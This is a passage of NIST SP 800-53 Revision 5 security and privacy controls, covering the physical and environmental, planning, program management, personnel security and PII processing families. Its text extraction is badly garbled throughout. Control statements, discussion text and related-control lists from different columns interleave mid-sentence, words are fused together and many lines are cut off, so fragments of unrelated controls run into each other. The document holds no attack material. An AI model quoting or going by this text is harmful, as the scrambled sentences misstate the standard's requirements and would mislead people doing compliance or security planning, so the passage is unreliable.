namesmonitoring
and organizations capabilities of individuals
to providevisiting, visitor signatures,
comprehensive and PE-2, PE-3, PE-6.
PE-8(1) Visitor Access Records | Automated Records Maintenance and Review organization-defined
Maintain and review visitor time period];
access records using [Assignment: organization-defined automated Visitor access records may be stored and maintained in a database management system that is None.
PE-5(1) Access Control for Output Devices | Access to Output by Authorized Individuals mechanisms].
[Withdrawn: Incorporated into PE-5.] accessible by organizational personnel. Automated access to such records facilitates record reviews
on a regular basis to determine if access authorizations are current and still required to support
PE-8(3) Visitor Access Records | Limit Personally Identifiable Information Elements Limit personally identifiable information contained in visitor access records to the following element organizational Organizations may mission haveand requirements that specify the contents of visitor access records. Limiting persRA-3, SA-8.
business functions.
PE-9 Power Equipment and Cabling Protect power equipment and power cabling for the system from damage and destruction. Organizations determine the types of protection necessary for the power equipment and cabling employ PE-4.
PE-9(1) Power Equipment and Cabling | Redundant Cabling Employ redundant power cabling paths that are physically separated by [Assignment: organization- Physically separate and redundant power cables ensure that power continues to flow in the event None.
PE-9(2) Power Equipment and Cabling | Automatic Voltage Controls defined distance].
Employ automatic voltage controls for [Assignment: organization-defined critical system that one of the cables is cut or otherwise damaged.
Automatic voltage controls can monitor and control voltage. Such controls include voltage None.
PE-10 Emergency Shutoff components].
a. Provide the capability of shutting off power to [Assignment: organization-defined system or regulators,
Emergency voltage conditioners,
power shutoff primarily andapplies
voltage tostabilizers.
organizational facilities that contain concentrations PE-15.
PE-5(3) Access Control for Output Devices | Marking Output Devices individual
[Withdrawn: system components]
Incorporated in emergency situations;
into PE-22.]
PE-11 Emergency Power Provide an uninterruptible power supply to facilitate [Selection (one or more): an orderly shutdown oAn uninterruptible power supply (UPS) is an electrical system or mechanism that provides emergencyAT-3, p CP-2, CP-7.
PE-11(1) Emergency Power | Alternate Power Supply — Minimal Operational Capability Provide an alternate power supply for the system that is activated [Selection: manually; Provision of an alternate power supply with minimal operating capability can be satisfied by None.
PE-11(2) Emergency Power | Alternate Power Supply — Self-contained automatically] and that can maintain minimally required operational
Provide an alternate power supply for the system that is activated [Selection: manually; capability in the event of an accessing a secondary commercial power supply or other external
The provision of a long-term, self-contained power supply can be satisfied by using one or more power supply. None.
extended loss of
automatically] andthethat
primary
is: power source. generators with
PE-12 Emergency Lighting Employ and maintain automatic emergency lighting for the system that activates in the event of a pow The provision of sufficient
emergency capacity
lightingtoapplies
meet the needsto
primarily oforganizational
the organization. facilities that contain conce CP-2, CP-7.
PE-12(1) Emergency Lighting | Essential Mission and Business Functions Provide emergency lighting for all areas within the facility supporting essential mission and business Organizations define their essential missions and functions. None.
PE-13 Fire Protection functions.
Employ and maintain fire detection and suppression systems that are supported by an independent eThe provision of fire detection and suppression systems applies primarily to organizational faciliti AT-3.
PE-13(1) Fire Protection | Detection Systems — Automatic Activation and Notification Employ fire detection systems that activate automatically and notify [Assignment: organization- Organizations can identify personnel, roles, and emergency responders if individuals on the None.
PE-13(2) Fire Protection | Suppression Systems — Automatic Activation and Notification defined
(a) Employpersonnel or roles] and
fire suppression [Assignment:
systems that activate organization-defined
automatically andemergency responders] in the
notify [Assignment: notification
Organizations listcan
need to have
identify accesspersonnel,
specific authorizations roles,or and clearances
emergency (e.g., to enter to
responders facilities where
if individuals on the None.
event of a fire.
organization-defined personnel or roles] and [Assignment: organization-defined emergency access is restricted due to the classification or impact level of
notification list need to have appropriate access authorizations and/or clearances (e.g., to enter toinformation within the facility).
PE-7 Visitor Control [Withdrawn: Incorporated into PE-2 and PE-3.] Notification mechanisms may require
responders]; and facilities where access is restricted dueindependent
to the impact energy
level or sources to ensure
classification of that the notification
information within the
PE-13(4) Fire Protection | Inspections Ensure that the facility undergoes [Assignment: organization-defined frequency] fire protection Authorized and qualified
facility). Notification personnel
mechanisms maywithin the jurisdiction
require independentofenergy the organization
sources toincludeensure state, county, None.
that the
PE-14 Environmental Controls inspections
a. Maintain by authorized
[Selection (oneand qualified
or more): inspectors and
temperature; identified
humidity; deficiencies
pressure; are resolved
radiation; within
[Assignment: and city fire inspectors
The provision of environmentaland fire marshals. Organizations
controls applies primarily provide escorts during
to organizational inspections
facilities in
that contain AT-3, CP-2.
[Assignment: organization-defined
organization-defined time period]. situations where the systems that reside within the facilities contain sensitive information.
PE-14(1) Environmental Controls | Automatic Controls Employ the following environmental
automatic environmental control]] levels within
controls the facility
in the facility to
where the system
prevent resides at The implementation of automatic environmental controls provides an immediate response to
fluctuations None.
[Assignment:
potentially organization-defined
harmful to the system: acceptable levels];
[Assignment: and
organization-defined automatic environmental environmental conditionsmay thatbe can
PE-14(2) Environmental Controls | Monitoring with Alarms and Notifications Employ environmental control monitoring that provides an alarm or notification of changes The alarm or notification andamage,
audible degrade,
alarm or aorvisual destroy messageorganizational
in real time systems or systems
to personnel or None.
controls].
potentially components.
PE-15 Water Damage Protection Protect the harmful
system from to personnel
damage or equipment
resulting fromto [Assignment:
water leakage by organization-defined personnel
providing master shutoff or roles
or isolation defined by
The provision of the
water organization.
damage protection Such alarms and notifications
primarily can help minimize
applies to organizational facilitiesharm thattocontain c AT-3, PE-10.
roles]. individuals and damage to organizational assets by facilitating a timely incident response.
PE-15(1) Water Damage Protection | Automation Support Detect the presence of water near the system and alert [Assignment: organization-defined Automated mechanisms include notification systems, water detection sensors, and alarms. None.
PE-16 Delivery and Removal personnel
a. Authorize orand
roles] using[Assignment:
control [Assignment:organization-defined
organization-definedtypes automated mechanisms].
of system components] entering Enforcing authorizations for entry and exit of system components may require restricting access to deCM-3, CM-8, MA-2, MA-3, MP-5, PE-20, SR-2, SR-3, SR-4, SR-6.
and exiting the facility; and

7 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

PE-17 Alternate Work Site a. Determine and document the [Assignment: organization-defined alternate work sites] allowed Alternate work sites include government facilities or the private residences of employees. While disti AC-17, AC-18, CP-7.
PE-18 Location of System Components for use by
Position employees;
system components within the facility to minimize potential damage from [Assignment: orgaPhysical and environmental hazards include floods, fires, tornadoes, earthquakes, hurricanes, terror CP-2, PE-5, PE-19, PE-20, RA-3.
PE-8(2) Visitor Access Records | Physical Access Records [Withdrawn: Incorporated into PE-2.]
PE-19 Information Leakage Protect the system from information leakage due to electromagnetic signals emanations. Information leakage is the intentional or unintentional release of data or information to an untrustedAC-18, PE-18, PE-20.
PE-19(1) Information Leakage | National Emissions Policies and Procedures Protect system components, associated data communications, and networks in accordance with Emissions Security (EMSEC) policies include the former TEMPEST policies. None.
PE-20 Asset Monitoring and Tracking national Emissions Security
Employ [Assignment: policies and procedures
organization-defined basedtechnologies]
asset location on the security
to category
track andor classification
monitor the locaAsset location technologies can help ensure that critical assets—including vehicles, equipment, and CM-8, PE-16, PM-8.
of the information.
PE-21 Electromagnetic Pulse Protection Employ [Assignment: organization-defined protective measures] against electromagnetic pulse damaAn electromagnetic pulse (EMP) is a short burst of electromagnetic energy that is spread over a rang PE-18, PE-19.
PE-22 Component Marking Mark [Assignment: organization-defined system hardware components] indicating the impact level orHardware components that may require marking include input and output devices. Input devices include AC-3, AC-4, AC-16, MP-3.
PE-23 Facility Location a. Plan the location or site of the facility where the system resides considering physical and Physical and environmental hazards include floods, fires, tornadoes, earthquakes, hurricanes, terrori CP-2, PE-18, PE-19, PM-8, PM-9, RA-3.
PL-1 Policy and Procedures environmental hazards; and
a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Planning policy and procedures for the controls in the PL family implemented within systems and organ PM-9, PS-8, SI-12.
PL-2 System Security and Privacy Plans 1. Develop
a. [Selectionsecurity
(one orand
more): Organization-level;
privacy Mission/business
plans for the system that: process-level; System-level] System security and privacy plans are scoped to the system and system components within the AC-2, AC-6, AC-14, AC-17, AC-20, CA-2, CA-3, CA-7, CM-9, CM-13, CP-2, CP-4, IR-4, IR-8,
planning
1. policy that:
Are consistent with the organization’s enterprise architecture; defined authorization boundary and contain an overview of the security and privacy requirements MA-4, MA-5, MP-4, MP-5, PL-7, PL-8, PL-10, PL-11, PM-1, PM-7, PM-8, PM-9, PM-10, PM-
PL-2(1) System Security and Privacy Plans | Concept of Operations [Withdrawn: Incorporated into PL-7.]
for the system and the controls selected to satisfy the requirements. The plans describe the 11, RA-3, RA-8, RA-9, SA-5, SA-17, SA-22, SI-12, SR-2, SR-4.
PL-2(2) System Security and Privacy Plans | Functional Architecture [Withdrawn: Incorporated into PL-8.] intended application of each selected control in the context of the system with a sufficient level of
PL-2(3) System Security and Privacy Plans | Plan and Coordinate with Other Organizational Entities [Withdrawn: Incorporated into PL-2.]
PL-3 System Security Plan Update [Withdrawn: Incorporated into PL-2.]
PL-4 Rules of Behavior a. Establish and provide to individuals requiring access to the system, the rules that describe their Rules of behavior represent a type of access agreement for organizational users. Other types of accesAC-2, AC-6, AC-8, AC-9, AC-17, AC-18, AC-19, AC-20, AT-2, AT-3, CM-11, IA-2, IA-4, IA-5,
PL-4(1) Rules of Behavior | Social Media and External Site/application Usage Restrictions responsibilities and of
Include in the rules expected behavior
behavior, for information
restrictions on: and system usage, security, and privacy; Social media, social networking, and external site/application usage restrictions address rules of beh MP-7,
AC-22,PS-6, PS-8, SA-5, SI-12.
AU-13.
PL-5 Privacy Impact Assessment (a) Use of social
[Withdrawn: media, social
Incorporated intonetworking
RA-8.] sites, and external sites/applications;
PL-6 Security-related Activity Planning [Withdrawn: Incorporated into PL-2.]
PL-7 Concept of Operations a. Develop a Concept of Operations (CONOPS) for the system describing how the organization The CONOPS may be included in the security or privacy plans for the system or in other system devel PL-2, SA-2, SI-12.
PL-8 Security and Privacy Architectures intends
a. Develop to operate
security the andsystem
privacyfrom the perspective
architectures for theof information
system that: security and privacy; and The security and privacy architectures at the system level are consistent with the organization-wide CM-2, CM-6, PL-2, PL-7, PL-9, PM-5, PM-7, RA-9, SA-3, SA-5, SA-8, SA-17, SC-7.
PL-8(1) Security and Privacy Architectures | Defense in Depth 1. Describe
Design the requirements
the security and privacy and approach tofor
architectures bethe
taken for protecting
system the confidentiality,
using a defense-in-depth integrity, security
approach Organizationsand privacy architectures
strategically allocatedescribed
security and in PM-7,
privacy which are integral
controls to and developed
in the security and privacyasarchite
part of SC-2, SC-3, SC-29, SC-36.
and availability of organizational information;
that: the enterprise architecture. The architectures include an architectural description, the allocation of
PL-8(2) Security and Privacy Architectures | Supplier Diversity Require that [Assignment: organization-defined controls] allocated to [Assignment: organization-definIsecurity nformation and technology products have
privacy functionality different
(including strengths
controls), and weaknesses.
security- Providing
and privacy-related a broad spectrum
information for SC-29, o SR-3.
PL-9 Central Management Centrally manage [Assignment: organization-defined controls and related processes]. Central management refers to organization-wide management and implementation of selected PL-8, PM-9.
PL-10 Baseline Selection Select a control baseline for the system. controls and processes. This includes planning, implementing, assessing, authorizing, and
Control baselines are predefined sets of controls specifically assembled to address the protection ne PL-2, PL-11, RA-2, RA-3, SA-8.
monitoring the organization-defined, centrally managed controls and processes. As the central
PL-11 Baseline Tailoring Tailor the selected control baseline by applying specified tailoring actions. The concept ofoftailoring
management controlsallows organizations
is generally associated to specialize or customize
with the concept a set of(inherited)
of common baseline controls
controls,by PL-10, RA-2, RA-3, RA-9, SA-8.
PM-1 Information Security Program Plan a. Develop and disseminate an organization-wide information security program plan that: An information security program plan is a formal document that provides an overview of the PL-2, PM-18, PM-30, RA-9, SI-12, SR-2.
PM-2 Information Security Program Leadership Role 1. Provides an overview of the requirements for the security program and a description of the security requirements for an organization-wide
Appoint a senior agency information security officer with the mission and resources to coordinate, The senior agency information security officer is an organizational official. For federal agencies information security program and describes the(as None.
security
develop, program
implement, management
andneeded
maintaincontrols and common controls in place or planned for meeting program management controls and common controls in place or planned for and
meeting those this
PM-3 Information Security and Privacy Resources a. Include
those the resources
requirements; to an organization-wide
implement information
the information security
security program.
and privacy programs in defined
Organizations
requirements.
by applicable
consider
An
laws, executive
establishing
information security
orders, regulations,
champions
program for
planinformation
can
directives,
be
policies,
security
represented and
in aprivacy
single
standards),
and, as part
document orof PM-4, SA-2.
capital planning and investment official is the senior agency information security officer. Organizations may also refer to this official
PM-4 Plan of Action and Milestones Process a. Implement a process to ensurerequests
that plansandofdocument
action andallmilestones
exceptionsfor tothe
thisinformation
requirement; security, as
Thethe plan of action
senior and milestones
information is a keyor
security officer organizational
chief information document
security andofficer.
is subject to reporting requi CA-5, CA-7, PM-3, RA-7, SI-12.
PM-5 System Inventory privacy, and
Develop and supply
updatechain risk management
[Assignment: programs and
organization-defined associated
frequency] anorganizational systems:
inventory of organizational OMB A-130 provides guidance on developing systems inventories and associated reporting None.
PM-5(1) System Inventory | Inventory of Personally Identifiable Information systems.
Establish, maintain, and update [Assignment: organization-defined frequency] an inventory of all systAn requirements.
inventory ofSystem systems, inventory refersand
applications, to an organization-wide
projects that processinventory
personallyofidentifiable
systems, not system s AC-3, CM-8, CM-12, CM-13, PL-8, PM-22, PT-3, PT-5, SI-12, SI-18.
information
components as described in CM-8.
PM-6 Measures of Performance Develop, monitor, and report on the results of information security and privacy measures of performMeasures of performance are outcome-based metrics used by an organization to measure the effectiven CA-7, PM-9.
PM-7 Enterprise Architecture Develop and maintain an enterprise architecture with consideration for information security, privacy,The integration of security and privacy requirements and controls into the enterprise architecture heAU-6, PL-2, PL-8, PM-11, RA-2, SA-3, SA-8, SA-17.
PM-7(1) Enterprise Architecture | Offloading Offload [Assignment: organization-defined non-essential functions or services] to other systems, sys Not every function or service that a system provides is essential to organizational mission or busines SA-8.
PM-8 Critical Infrastructure Plan Address information security and privacy issues in the development, documentation, and updating ofProtection a strategies are based on the prioritization of critical assets and resources. The requirementCP-2, CP-4, PE-18, PL-2, PM-9, PM-11, PM-18, RA-3, SI-12.
PM-9 Risk Management Strategy a. Develops a comprehensive strategy to manage: An organization-wide risk management strategy includes an expression of the security and privacy riskAC-1, AU-1, AT-1, CA-1, CA-2, CA-5, CA-6, CA-7, CM-1, CP-1, IA-1, IR-1, MA-1, MP-1, PE-1,
PM-10 Authorization Process 1. Security risk to organizational operations and assets, individuals, other organizations, and the
a. Manage the security and privacy state of organizational systems and the environments in which Authorization processes for organizational systems and environments of operation require the impleme PL-1,
CA-6, PL-2,
CA-7,PM-2,
PL-2. PM-8, PM-18, PM-28, PM-30, PS-1, PT-1, PT-2, PT-3, RA-1, RA-3, RA-9,
Nation
those associated
systems with through
operate the operation and use of organizational systems; and SA-1, SA-4, SC-1, SC-38, SI-1, SI-12, SR-1, SR-2.
PM-11 Mission and Business Process Definition a. Define organizational missionauthorization
and business processes;
processes with consideration for information security Protection needs are technology-independent capabilities that are required to counter threats to orgaCP-2, PL-2, PM-7, PM-8, RA-2, RA-3, RA-9, SA-2.
PM-12 Insider Threat Program and privacy and the resulting risk to organizational operations, organizational assets, individuals,
Implement an insider threat program that includes a cross-discipline insider threat incident handling Organizations that handle classified information are required, under Executive Order 13587 EO AC-6, AT-2, AU-6, AU-7, AU-10, AU-12, AU-13, CA-7, IA-4, IR-4, MP-7, PE-2, PM-16, PS-3,
other organizations, and the Nation; and 13587
PM-13 Security and Privacy Workforce Establish a security and privacy workforce development and improvement program. Securityand andthe National
privacy Insider development
workforce Threat Policy ODNI NITP, to establish
and improvement insider
programs threatdefining
include programs. theThe PS-4,
AT-2, PS-5,
knowledge, AT-3. PS-7, PS-8, SC-7, SC-38, SI-4, PM-14.
same standards and guidelines that apply to insider threat programs in classified environments can
PM-14 Testing, Training, and Monitoring a. Implement a process for ensuring that organizational plans for conducting security and privacy A process
also for organization-wide
be employed effectively to improve security the andsecurity
privacy testing, training,
of controlled and monitoring
unclassified and otherhelps ensure t AT-2, AT-3, CA-7, CP-4, IR-3, PM-12, SI-4.
PM-15 Security and Privacy Groups and Associations testing, training, and monitoring activities associated with organizational systems:
Establish and institutionalize contact with selected groups and associations within the security and Ongoing contact with security and privacy groups and associations is important in an environment of SA-11, ra SI-5.
PM-16 Threat Awareness Program privacy
Implement communities:
a threat awareness program that includes a cross-organization information-sharing capabili Because of the constantly changing and increasing sophistication of adversaries, especially the advancIR-4, PM-12.
PM-16(1) Threat Awareness Program | Automated Means for Sharing Threat Intelligence Employ automated mechanisms to maximize the effectiveness of sharing threat intelligence To maximize the effectiveness of monitoring, it is important to know what threat observables and None.
PM-17 Protecting Controlled Unclassified Information on External Systems information.
a. Establish policy and procedures to ensure that requirements for the protection of controlled indicators
Controlledthe sensors need
unclassified to be searching
information is defined for.
byBythe using well-established
National Archives andframeworks, services, andalCA-6, PM-10.
Records Administration
PM-18 Privacy Program Plan unclassified
a. Develop and information
disseminate thatanis organization-wide
processed, stored privacyor transmitted
program onplan
external systems,an
that provides areoverview automated
A privacy program
tools, organizations improve their ability to rapidly share and feed the relevant threat
plan
implemented inprivacy
accordance applicable laws, executive orders, directives, policies, regulations, detection
with and: signatures intois monitoring
a formal document tools. that provides an overview of an organization’s privacy PM-8, PM-9, PM-19.
PM-19 Privacy Program Leadership Role of the
Appoint agency’s
a seniorand program,
agency official for privacy with the authority, mission, accountability, and resour program, including a description of the structure of the privacy
The privacy officer is an organizational official. For federal agencies—as defined by applicable program, the resources dedicated
laws,toe PM-18, PM-20, PM-23, PM-24, PM-27.
and standards; the privacy program, the role of the senior agency official for privacy and other privacy officials and
PM-20 Dissemination of Privacy Program Information Maintain a central resource webpage on the organization’s principal public website that serves as a For staff,federal agencies,
the strategic theand
goals webpage
objectivesis located
of theatprivacy
www.[agency].gov/privacy.
program, and the program Federal agencies include AC-3, PM-19, PT-5, PT-6, PT-7, RA-8.
management
PM-20(1) Dissemination of Privacy Program Information | Privacy Policies on Websites, Applications, and central source
Develop and post of information
privacy policies about onthe organization’s privacy
all external-facing websites,program
mobileand that:
applications, and other Organizations post privacy policies on all external-facing websites, mobile applications, and other None.
PM-21 Digital Services
Accounting of Disclosures digital services,
a. Develop that:
and maintain an accurate accounting of disclosures of personally identifiable digital services.
The purpose Organizations
of accounting post a link to
of disclosures theallow
is to relevant privacyto
individuals policy
learnon toany
whom known,
theirmajor entry AC-3, AU-2, PT-2.
personally
information, points to theinformation
website, application, or digital service. In addition,
basis fororganizations provide a link to the
PM-22 Personally Identifiable Information Quality Management Develop and including:
document organization-wide policies and procedures for: identifiable
Personally
privacy identifiable
policy on any
has been disclosed,
information
webpage that quality
collects
to provide
management
personally
a includes
identifiable
subsequently
steps advising
that organizations
information.
recipients
Organizationstakemay
to PM-23, SI-18.
a. Reviewing for Governance
the accuracy,Body relevance, timeliness, and completeness of personally identifiable of any corrected
confirm the accuracyor disputed
and can personally
relevance identifiable
of personally information, and to provide an auditthetrail for
PM-23 Data Governance Body Establish a Data consisting of [Assignment: organization-defined roles] with [AssignA Data Governance
subsequent Body help ensure that theidentifiable
organization information
hasfor
coherent throughout
policies
For and the ability toAT-2, AT-3, PM-19, PM-22, PM-24, PT-7, SI-4, SI-19.
information across the information life cycle; information reviews
life cycle.ofThe organizational
informationcompliance with
life cycle includes conditions
the creation, disclosures.
collection, use, federal
processing,
PM-24 Data Integrity Board Establish a Data Integrity Board to: A Data Integrity Board is the board of senior officials designated
storage, maintenance, dissemination, disclosure, and disposition of personally identifiable by the head of a federal agency a AC-4, PM-19, PM-23, PT-2, PT-8.
PM-25 Minimization of Personally Identifiable Information Used in Testing, Training, and Research a. Develop,
a. Review proposals
document, to conduct or participate
and implement policiesinand
a matching
procedures program; and the use of personally The use of personally identifiable information in testing, research, and training increases the risk of PM-23, PT-3, SA-3, SA-8, SI-12.
that address
PM-26 Complaint Management identifiable information for internal testing, training, and research;
Implement a process for receiving and responding to complaints, concerns, or questions from Complaints, concerns, and questions from individuals can serve as valuable sources of input to organiIR-7, IR-9, PM-22, SI-18.
PM-27 Privacy Reporting individuals
a. about the organizational
Develop [Assignment: security and
organization-defined privacy
privacy practices
reports] andthat includes:to:
disseminate Through internal and external reporting, organizations promote accountability and transparency in org IR-9, PM-19.
PM-28 Risk Framing 1. [Assignment:
a. Identify organization-defined oversight bodies] to demonstrate accountability with
and document: Risk framing is most effective when conducted at the organization level and in consultation with stakeCA-7, PM-9, RA-3, RA-7.
statutory,
1. Assumptions regulatory,
affectingandrisk policy privacy mandates;
assessments, risk and and risk monitoring;
responses,
PM-29 Risk Management Program Leadership Roles a. Appoint a Senior Accountable Official for Risk Management to align organizational information The senior accountable official for risk management leads the risk executive (function) in organizatio PM-2, PM-19.
PM-30 Supply Chain Risk Management Strategy security
a. Develop andanprivacy managementstrategy
organization-wide processes
for with strategic,
managing supplyoperational,
chain risksand budgetary
associated planning
with the An organization-wide supply chain risk management strategy includes an unambiguous expression ofCM-10, the PM-9, SR-1, SR-2, SR-3, SR-4, SR-5, SR-6, SR-7, SR-8, SR-9, SR-11.
processes; andacquisition, maintenance, and disposal of systems, system components, and system
development,
PM-30(1) Supply Chain Risk Management Strategy | Suppliers of Critical or Mission-essential Items Identify, prioritize, and assess suppliers of critical or mission-essential technologies, products, and serThe identification and prioritization of suppliers of critical or mission-essential technologies, prod RA-3, SR-6.
services;
PM-31 Continuous Monitoring Strategy Develop an organization-wide continuous monitoring strategy and implement continuous Continuous monitoring at the organization level facilitates ongoing awareness of the security and pr AC-2, AC-6, AC-17, AT-4, AU-6, AU-13, CA-2, CA-5, CA-6, CA-7, CM-3, CM-4, CM-6, CM-11,
PM-32 Purposing monitoring programs that
Analyze [Assignment: include:
organization-defined systems or systems components] supporting mission essenti Systems are designed to support a specific mission or business function. However, over time, systemsCA-7, IA-5, IR-5,
PL-2,MA-2,
RA-3, MA-3,
RA-9. MA-4, PE-3, PE-6, PE-14, PE-16, PE-20, PL-2, PM-4, PM-6, PM-9,
PM-10, PM-12, PM-14, PM-23, PM-28, PS-7, PT-7, RA-3, RA-5, RA-7, SA-9, SA-11, SC-5,
PS-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Personnel security policy and procedures for the controls in the PS family that are implemented withiPM-9, PS-8, SI-12.
SC-7, SC-18, SC-38, SC-43, SI-3, SI-4, SI-12, SR-2, SR-4.
PS-2 Position Risk Designation 1. Assign
a. [Selectiona risk (one or more):to
designation Organization-level;
all organizational Mission/business
positions; process-level; System-level] Position risk designations reflect Office of Personnel Management (OPM) policy and guidance. ProperAC-5, po AT-3, PE-2, PE-3, PL-2, PS-3, PS-6, SA-5, SA-21, SI-12.
personnel
b. Establish security
screening policy that:for individuals filling those positions; and
criteria
PS-3 Personnel Screening a. Screen individuals prior to authorizing access to the system; and Personnel screening and rescreening activities reflect applicable laws, executive orders, directives, AC-2, IA-4, MA-5, PE-2, PM-12, PS-2, PS-6, PS-7, SA-21.
PS-3(1) Personnel Screening | Classified Information b. Rescreen
Verify individualsaccessing
that individuals in accordancea systemwithprocessing,
[Assignment: organization-defined
storing, conditions
or transmitting classified requiring Classified information is the most sensitive information that the Federal Government processes, stores
information AC-3, AC-4.
rescreening and, where rescreening is so indicated, the frequency of rescreening].
PS-3(2) Personnel Screening | Formal Indoctrination Verify that individuals accessing a system processing, storing, or transmitting types of classified inf Types of classified information that require formal indoctrination include Special Access Program (S AC-3, AC-4.
PS-3(3) Personnel Screening | Information Requiring Special Protective Measures Verify that individuals accessing a system processing, storing, or transmitting information requiring Organizational information that requires special protection includes controlled unclassified None.
PS-3(4) Personnel Screening | Citizenship Requirements specialthat
Verify protection:
individuals accessing a system processing, storing, or transmitting [Assignment: information.
None. Personnel security criteria include position sensitivity background screening None.
organization-defined information types] meet [Assignment: organization-defined citizenship requirements.
PS-4 Personnel Termination Upon termination of individual employment: System property includes hardware authentication tokens, system administration technical manuals, AC-2, keys IA-4, PE-2, PM-12, PS-6, PS-7.
requirements].
a. Disable system access within [Assignment:
PS-4(1) Personnel Termination | Post-employment Requirements (a) Notify terminated individuals of applicable,organization-defined time period]; requirements for Organizations consult with the Office of the General Counsel regarding matters of post-employment None.
legally binding post-employment
PS-4(2) Personnel Termination | Automated Actions the protection
Use [Assignment: of organizational
organization-defined information; and mechanisms] to [Selection (one or more): notify In
automated requirements
organizations onwith
terminated individuals.not all personnel who need to know about termination
many employees, None.
PS-5 Personnel Transfer [Assignment:
a. Review andorganization-defined
confirm ongoing operational personnel or roles]
need of individual
for current logical termination
and physicalactions;
access disable actions
Personnel receive
transferthe applies
appropriate whennotifications,
reassignments or or
if such notifications
transfers are received,
of individuals they may
are permanent ornot
of such ex AC-2, IA-4, PE-2, PM-12, PS-4, PS-7.
access to system resources].
authorizations occur in a timely manner. Automated mechanisms can be used to send automatic alerts or
PS-6 Access Agreements a. Develop andto systems and
document accessfacilities when individuals
agreements are reassigned
for organizational systems;or transferred to other Access agreements
notifications include nondisclosure
to organizational personnel oragreements,
roles when acceptable
individuals use agreements,Such
are terminated. rulesautomatic
of behavior,AC-17,
a PE-2, PL-4, PS-2, PS-3, PS-6, PS-7, PS-8, SA-21, SI-12.
positions
b. Review within
and the organization;
update the access agreements [Assignment: organization-defined frequency]; and
PS-6(1) Access Agreements | Information Requiring Special Protection [Withdrawn: Incorporated into PS-3.]
PS-6(2) Access Agreements | Classified Information Requiring Special Protection Verify that access to classified information requiring special protection is granted only to individuals Classified information that requires special protection includes collateral information, Special None.
PS-6(3) Access Agreements | Post-employment Requirements who:
(a) Notify individuals of applicable, legally binding post-employment requirements for protection of Access Program
Organizations (SAP) with
consult information,
the Office andof Sensitive
the General Compartmented
Counsel regarding Information
matters(SCI). Personnel
of post-employment PS-4.
organizational information; andrequirements, including security roles and responsibilities for security criteria reflect applicable laws, executive orders, directives, regulations, policies, standards,
PS-7 External Personnel Security a. Establish personnel security External
and provider refers to organizations other than the organization operating or acquiring the syst AT-2, AT-3, MA-5, PE-3, PS-2, PS-3, PS-4, PS-5, PS-6, SA-5, SA-9, SA-21.
guidelines.
PS-8 Personnel Sanctions external
a. Employproviders;
a formal sanctions process for individuals failing to comply with established information Organizational sanctions reflect applicable laws, executive orders, directives, regulations, policies, PL-4, PM-12, PS-6, PT-1.
PS-9 Position Descriptions security
Incorporate and security
privacy policies
and privacy and roles
procedures; and
and responsibilities into organizational position descriptions. Specification of security and privacy roles in individual organizational position descriptions None.
PT-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: facilitates Personallyclarity in understanding
identifiable informationthe security and
processing or privacy responsibilities
transparency policy and associated
procedures with the roles
address the None.
1. Determine
[Selection (one or more): Organization-level; Mission/business process-level; System-level] and the role-based
controls in the PT security thatand areprivacy trainingwithin
requirements for andthe roles.
PT-2 Authority to Process Personally Identifiable Information a. and document the [Assignment: organization-defined authority] that permits the The processing of family
personally implemented
identifiable information issystems an operation organizations. The riskthat the
or set of operations AC-2, AC-3, CM-13, IR-9, PM-9, PM-24, PT-1, PT-3, PT-5, PT-6, RA-3, RA-8, SI-12, SI-18.
personally identifiable
[Assignment: information processing]
organization-defined processing and transparency
of personally policy that:
identifiable information; managementsystem strategy is an important factor inwithestablishing tosuch policiesidentifiable
and procedures. Policies
PT-2(1) Authority to Process Personally Identifiable Information | Data Tagging Attach data tags containing [Assignment: organization-defined authorized processing]andto [Assignment:information
Dataprocedures
and tags support theor tracking
contribute
organization performs
and enforcement
to security and privacy
respect
ofassurance.
authorized personally
processing by conveying information
the types of pAC-16, CA-6, CM-12, PM-5, PM-22, PT-4, SC-16, SC-43, SI-10, SI-15, SI-19.
across the information life cycle. Processing includes but is notTherefore,
limited toitcreation,
is important that
collection, security
use,
PT-2(2) Authority to Process Personally Identifiable Information | Automation Manage enforcement of the authorized processing of personally identifiable information using [As Automated mechanisms augment verification that only authorized
processing, storage, maintenance, dissemination, disclosure, and disposal. Processing operations processing is occurring. CA-6, CM-12, PM-5, PM-22, PT-4, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-3 Personally Identifiable Information Processing Purposes a. Identify and document the [Assignment: organization-defined purpose(s)] for processing Identifying and documenting the purpose for processing provides organizations with a basis for AC-2, AC-3, AT-3, CM-13, IR-9, PM-9, PM-25, PT-2, PT-5, PT-6, PT-7, RA-8, SC-43, SI-12, SI-
PT-3(1) Personally Identifiable Information Processing Purposes | Data Tagging personally
Attach data tags containing the following purposes to [Assignment: organization-defined elements ofData tags support the tracking of processing purposes by conveying the purposes along with the rele 18.
identifiable information; understanding why personally identifiable information may be processed. The term process CA-6, CM-12, PM-5, PM-22, SC-16, SC-43, SI-10, SI-15, SI-19.
includes every step of the information life cycle, including creation, collection, use, processing,
storage, maintenance, dissemination, disclosure, and disposal. Identifying and documenting the

8 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

PT-3(2) Personally Identifiable Information Processing Purposes | Automation Track processing purposes of personally identifiable information using [Assignment: organization- Automated mechanisms augment tracking of the processing purposes. CA-6, CM-12, PM-5, PM-22, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-4 Consent Implement [Assignment: organization-defined tools or mechanisms] for individuals to consent to the Consent pro allows individuals to participate in making decisions about the processing of their informati AC-16, PT-2, PT-5.
PT-4(1) Consent | Tailored Consent Provide [Assignment: organization-defined mechanisms] to allow individuals to tailor processing permi While some processing may be necessary for the basic functionality of the product or service, other pPT-2.
PT-4(2) Consent | Just-in-time Consent Present [Assignment: organization-defined consent mechanisms] to individuals at [Assignment: organiJust-in-time consent enables individuals to participate in how their personally identifiable informati PT-2.
PT-4(3) Consent | Revocation Implement [Assignment: organization-defined tools or mechanisms] for individuals to revoke consentRevocation t of consent enables individuals to exercise control over their initial consent decision when PT-2.
PT-5 Privacy Notice Provide notice to individuals about the processing of personally identifiable information that: Privacy notices help inform individuals about how their personally identifiable information is being PM-20, PM-22, PT-2, PT-3, PT-4, PT-7, RA-3, SC-42, SI-18.
PT-5(1) Privacy Notice | Just-in-time Notice a. Is available to individuals upon first interacting with an organization, and subsequently
